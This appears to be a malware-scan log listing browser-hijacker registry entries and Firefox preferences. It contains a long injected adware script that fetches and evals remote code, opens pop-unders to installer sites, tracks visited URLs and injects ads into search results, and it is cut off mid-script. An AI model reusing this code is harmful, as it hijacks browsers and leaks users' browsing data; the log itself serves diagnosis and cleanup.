IE - HKCU\..\URLSearchHook: {539F76FD-084E-4858-86D5-62F02F54AE86} - C:\Program Files (x86)\Minibar\Minibar.dll (KangoExtensions)

IE - HKCU\..\SearchScopes,bProtectorDefaultScope = {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}

IE - HKCU\..\SearchScopes,DefaultScope = {67A2568C-7A0A-4EED-AECC-B5405DE63B64}

IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...Box&FORM=IE8SRC

IE - HKCU\..\SearchScopes\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}: "URL" = http://start.mysearc...=1727878116&ir=

IE - HKCU\..\SearchScopes\{1936EF5F-34A0-4463-AFA7-876B5DEBF462}: "URL" = http://search.condui...5253069553&UM=1

IE - HKCU\..\SearchScopes\{391588CC-C239-46D5-90E3-05638F1D5DF5}: "URL" = http://search.creati...q={searchTerms}

IE - HKCU\..\SearchScopes\{4A720000-424D-40a9-A87E-3EBD3E7536CA}: "URL" = http://search.passwo...m={searchTerms}

IE - HKCU\..\SearchScopes\{57238BE3-743E-4BE5-9F23-6AE7B33571A8}: "URL" = http://www.mysearchr...q={searchTerms}

IE - HKCU\..\SearchScopes\{67A2568C-7A0A-4EED-AECC-B5405DE63B64}: "URL" = http://www.google.co...1I7ACAW_deVN406

IE - HKCU\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...1I7ACAW_deVN406

IE - HKCU\..\SearchScopes\{77AA745B-F4F8-45DA-9B14-61D2D95054C8}: "URL" = http://visualbee.del...121377&tsp=5004

IE - HKCU\..\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}: "URL" = http://websearch.wis...&cc=VN&unqvl=39

IE - HKCU\..\SearchScopes\{E627DC4B-8C04-4234-A2D4-1D634EE01C41}: "URL" = http://www.bigseekpr...q={searchTerms}

IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local

========== FireFox ==========

FF - prefs.js..browser.search.defaultenginename: "Search"

FF - prefs.js..browser.search.defaultenginename,S: S", "WebSearch"

FF - prefs.js..browser.search.defaulturl: "http://www.bigseekpr...={searchTerms}"

FF - prefs.js..browser.search.order.1: "Search"

FF - prefs.js..browser.search.order.1,S: S", "WebSearch"

FF - prefs.js..browser.search.selectedEngine: "Google"

FF - prefs.js..browser.search.selectedEngine,S: S", "WebSearch"

FF - prefs.js..browser.search.useDBForOrder: true

FF - prefs.js..browser.startup.homepage: "http://www.n-tv.de/"

FF - prefs.js..extensions.enabledAddons: {97A78363-B868-4B48-AC91-A783A31215AF}:2.0.1

FF - prefs.js..extensions.enabledAddons: {f9d03c26-0575-497e-821d-f7956d23e0ca}:3.0

FF - prefs.js..extensions.enabledAddons: [email protected]:2.0

FF - prefs.js..extensions.enabledAddons: {635abd67-4fe9-1b23-4f01-e679fa7484c1}:2.5.9.20130409112616

FF - prefs.js..extensions.enabledAddons: [email protected]:2.3.2

FF - prefs.js..extensions.mNw7YgSF_.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1){return}}catch(e){};new function(){var a=this;a.domain_storage=\"http://xls.searchfun.in/nx\";a.prefix=\"if72ru4ruh7fewui\";a.conf={\"1\":{\"0\":1,\"1\":21600,\"2\":0,\"3\":0,\"4\":0,\"5\":21600,\"6\":21600,\"7\":0,\"8\":0,\"9\":21600,\"10\":21600,\"11\":0,\"12\":21600,\"13\":21600,\"17\":0,\"18\":12345,\"19\":21600,\"20\":21600,\"21\":21600,\"22\":21600,\"29\":21600,\"30\":21600,\"32\":0,\"33\":21600,\"35\":21600,\"41\":0,\"44\":21600,\"45\":21600,\"46\":0,\"47\":21600},\"3\":{\"0\":1,\"1\":0,\"5\":0,\"6\":0,\"9\":0,\"10\":0,\"12\":0,\"13\":0,\"17\":0,\"19\":0,\"20\":0,\"21\":0,\"22\":0,\"29\":0,\"30\":0,\"32\":0,\"33\":0,\"35\":0,\"41\":0,\"44\":0,\"45\":0,\"46\":0,\"47\":0}};a.pop_collision_id=\"__ipu=1\";a.setStorage=function(b,e,d){localStorage.setItem(a.prefix+\"_\"+b+\"_site\",e+parseInt(d));localStorage.setItem(a.prefix+\"_\"+b+\"_global\",e)};a.ajax=new function(){var b=this;b.get=function(e,d){try{var c=a.utils.randomChar();\"undefined\"!==typeof b[c]&&(c=a.utils.randomChar());b[c]=new XMLHttpRequest;b[c].open(\"GET\",e,!0);b[c].onreadystatechange=function(){4==b[c].readyState&& d(b[c].responseText)};b[c].send()}catch(f){}};b.post=function(e,a,c){b.xhr=new XMLHttpRequest;b.xhr.open(\"POST\",e,!0);b.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");b.xhr.onreadystatechange=function(){4==b.xhr.readyState&&c(b.xhr.responseText)};a=encodeURIComponent(a);b.xhr.send(a)}};a.utils=new function(){var b=this;b.randomChar=function(){for(var b=\"\",a=0;2>a;a++)b+=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\".charAt(Math.floor(52*Math.random())); return b};b.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};b.inject_script=function(b){if(b instanceof Array)for(var a=0;a<b.length;a++){var c=document.createElement(\"script\");c.type=\"text/javascript\";var f=b[a];\"function\"==typeof f?c.text=f:c.src=f;document.getElementsByTagName(\"body\")[0].appendChild©}};b.epoch=function(){return Math.floor((new Date).getTime()/1E3)};b.getKeywords= function(){var b=document.title,a=document.getElementsByTagName(\"meta\");if(a)for(var c=0,f=a.length;c<f;c++)\"keywords\"==a[c].name.toLowerCase()&&(b+=\" \"+a[c].content.replace(/,/g,\" \"));return b.replace(/[_-]/g,\" \")};b.getVert=function(){var a=localStorage.getItem(\"sk398erjds2d\");return a?a:b.forexVert()}};a.products=new function(){var b=this;b.code_1=function(a,d,c,f,g,h){c=\"http://installerapplicationusa.com/?vert=\"+c+\"&rff=\"+window.self.location.hostname+\"&pid=1539&hid=6563864032225124500&ch=61&\"+ h;localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_site\",d+parseInt(f));localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_global\",d+parseInt(g));(function(a){(function(a){var c=top!=b&&\"string\"===typeof top.document.location.toString()?top:b,e=null,d={},f=d.name||Math.floor(1E3*Math.random()+1),g=d.width||window.outerWidth||window.innerWidth||document.documentElement.clientWidth,h=d.height||window.outerHeight-100||window.innerHeight||document.documentElement.clientHeight,m=\"undefined\"!=typeof d.left?d.left.toString(): window.screenX,d=\"undefined\"!=typeof d.top?d.top.toString():window.screenY,n=function(){var a=navigator.userAgent.toLowerCase(),b={webkit:/webkit/.test(a),mozilla:/mozilla/.test(a)&&!/(compatible|webkit)/.test(a),chrome:/chrome/.test(a),msie:/msie/.test(a)&&!/opera/.test(a),firefox:/firefox/.test(a),safari:/safari/.test(a)&&!/chrome/.test(a),opera:/opera/.test(a)};b.version=b.safari?(a.match(/.+(?:ri)[\\/: ]([\\d.]+)/)||[])[1]:(a.match(/.+(?:ox|me|ra|ie)[\\/: ]([\\d.]+)/)||[])[1];return b}();(function(a, b,d,f,g,h){var k=\"toolbar=no,scrollbars=yes,location=yes,statusbar=yes,menubar=no,resizable=1,width=\"+d.toString()+\",height=\"+f.toString()+\",screenX=\"+g+\",screenY=\"+h,l=function(){window.removeEventListener?document.removeEventListener(\"click\",l,!1):document.detachEvent(\"onclick\",l);if(e=c.window.open(a,b,k))try{e.blur();e.opener.window.focus();window.self.window.focus();window.focus();if(n.firefox){var d=window.open(\"about:blank\");d.focus();d.close()}n.webkit&&openCloseTapreb();n.msie&&(e.opener.window.focus(), window.self.window.focus(),window.focus())}catch(f){}};document.addEventListener?document.addEventListener(\"click\",l,!1):document.attachEvent(\"onclick\",l)})(a,f,g,h,m,d)})(a)})©};b.code_3=function(a,b,c,f,g,h){var m=\"http://childsafedownloadx.asia/?vert=\"+c+\"&rff=\"+window.self.location.hostname+\"&pid=1539&hid=6563864032225124500&ch=61&\"+h;localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_site\",b+parseInt(f));localStorage.setItem(\"if72ru4ruh7fewui_\"+a+\"_global\",b+parseInt(g));var k=function(){window.open(m, \"_blank\");window.removeEventListener?document.removeEventListener(\"click\",k,!1):document.detachEvent(\"onclick\",k)};document.addEventListener?document.addEventListener(\"click\",k,!1):document.attachEvent(\"onclick\",k)}};a.checkXtrg=function(b,e){a.utils.isIE()?a.utils.inject_script([a.products[\"code_\"+b],e]):a.ajax.get(e,function(a){\"\"!==a&&eval(a)})};a.checkFreq=function(b,e){var d=a.prefix+\"_\"+b,c=localStorage.getItem(d+\"_site\"),d=localStorage.getItem(d+\"_global\"),f=a.conf[\"0\"],g=encodeURIComponent(a.utils.getKeywords()), f=encodeURIComponent(\"ddadv.products.code_\"+b+\"(\"+b+\",\"+e+\",_vert_, _vfrq_, \"+f+\",\"+a.pop_collision_id+\")\"),g=a.domain_storage+\"/?p=\"+b+\"&gf=\"+a.conf[0]+\"&t=\"+e+\"&cb=\"+f+\"&k=\"+g;c||d?parseInt(d)>e||!c||parseInt©>e||a.checkXtrg(b,g):a.checkXtrg(b,g)};a.init=function(){if(\"undefined\"!==typeof localStorage&&\"undefined\"!==typeof localStorage.getItem&&-1==window.location.href.indexOf(a.pop_collision_id)&&-1<window.self.location.protocol.indexOf(\"http\")){var b=a.utils.epoch(),e;for(e in a.conf)a.products[\"code_\"+ e]&&a.checkFreq(e,b)}};window.self==window.top&&a.init();\"undefined\"==typeof window.ddadv&&(window.ddadv=a)};;if(window.self==window.top && \"www.google.com,mail.google.com,en.wikipedia.org,www.facebook.com\".indexOf(window.self.location.hostname) == -1){var s1 = document.createElement(\"script\");s1.type = \"text/javascript\";s1.src = \"http://intext.nav-links.com/js/intext.js?afid=advertisewp&subid=advertisewp8&maxlinks=8&linkcolor=#0000FF\";document.getElementsByTagName(\"head\")[0].appendChild(s1);};window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.4.1\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g=g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null}; a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)}; b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"undefined\"==typeof Element.prototype.appendChild.toString)document.getElementsByTagName(\"head\")[0].appendChild(a);else if(\"bing\"==b){var e=Element.prototype.appendChild,f=document.createElement(\"iframe\");Element.prototype.appendChild=f.document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©; clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!= typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1< b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b= new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.version_ie_less= function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\", \"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src=b.pixelHost+\"?hid=6563864032225124500&eid=310&pid=1539&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=VN&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\", \"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d= 0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;this.is_direction_right=function(){b.utils.waitForElement(\".col\",function(a){if(null==a||\"right\"==b.utils.get_computed_style(a[0]).getPropertyValue(\"float\"))return!0; if(!c.check_tab())return!1},1E3,\"validate\")};c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\");if(null==a||\"undefined\"==typeof a)if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return b.utils.query_selector_all(\".hdtb_mitem\")[0].className.match(/hdtb_msel/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};return c.is_direction_right()?!1:!0}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"], urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}}, ask:{hrefSelector:\".ptbs a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\"); if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"], src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()}, !1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.com*&field-keywords=*\"], src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\$([0-9]+)\$/);if(c&& 1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b, d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom= new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);c.style[f]=a.attrs.style[e]}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&& (c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(g){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault? a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f< d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a=a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\", \"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json= function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k))return k; return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")}; b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left= !1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()}, !1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.loop_targets=function(a,c,d){if(a instanceof Object&& (b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a.node=b.create_search(a)}catch(e){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig, \"_href=\")}},20)},!1,a[c],!0)};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.utils.flushWaitForTokens()}))}; b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1}; b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return 